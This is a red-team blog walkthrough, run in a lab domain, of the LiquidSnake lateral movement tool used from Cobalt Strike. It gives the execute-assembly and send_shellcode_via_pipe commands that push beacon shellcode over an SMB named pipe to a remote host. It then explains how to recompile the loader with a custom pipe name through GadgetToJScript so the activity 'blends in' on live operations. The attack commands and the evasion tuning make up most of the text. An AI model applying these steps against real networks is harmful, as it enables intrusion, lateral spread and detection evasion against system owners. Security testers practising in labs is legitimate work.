LiquidSnake is a recently released lateral movement tool, using WMI event subscription and SMB named pipes for shellcode transfer. The author, @dottor_morte, has also provided a Cobalt Strike aggressor script for easy integration with beacon.

Testing Vanilla LiquidSnake

Without modifying the LiquidSnake solution, set the target architecture to x64 and build - this will be our execute-assembly target from beacon.

I’ve got a beacon running on a Windows 10 system in my lab environment, we’ll be using this as the starting point for lateral movement.

Initial beacon

Using the user context (REDANIA\vizimir) already established in beacon, we’ll test moving to oxenfurt.redania.local. This can be accomplished with beacon’s execute-assembly function (or better yet, BOF.NET) and the compiled LiquidSnake binary:

execute-assembly /opt/aggressor/LiquidSnake.exe oxenfurt.redania.local

LiquidSnake

Make sure to wait for the full output to be received before continuing - during this time the WMI event sub is being created and subsequently trigged. Once triggered, the target host will be listening on a SMB named pipe for shellcode to be executed. By default, the named pipe used is \\.\pipe\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7. We’ll come back to this value later.

The author has a BOF and aggressor script which can be used to deliver our beacon shellcode to the listening pipe. I’ve generated some stageless beacon shellcode tied to the HTTPS listener to send. First, load up the aggressor script: Aggressor Script

Deliver the shellcode:

send_shellcode_via_pipe \\oxenfurt\pipe\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7 /opt/aggressor/beacon.bin

Send Shellcode

And there’s our new beacon on the target: New Beacon

Customizing the Named Pipe

If we’re to use LiquidSnake on a live operation, we’ll likely want to change to named pipe to better blend in. To do this, we’ll have to recompile the CSharpNamedPipeLoader solution from the LiquidSnake repo.

In Program.cs on line 410, set the pipe name to your preferred value:

IntPtr hPipe = CreateNamedPipe("\\\\.\\pipe\\MyNewPipeName")

Make sure the project architecture is set to x64 and compile. To work the edit into LiquidSnake, GadgetToJScript is used: GadgetToJScript

Base64 up the resulting test.vbs file: Base64 VBS

Paste that string into the LiquidSnake solution in Program.cs on line 29:

string vbscript64 = "RnVuY3Rbpb24gQmFzZTY0VG9..."

Recompile the project and it’s back over to Cobalt Strike. Repeat the previously used beacon commands, except this time sub in your custom named pipe value when running send_shellcode_via_pipe: Modded LiquidSname

And we receive our third beacon, this one using the custom pipe name: Third Beacon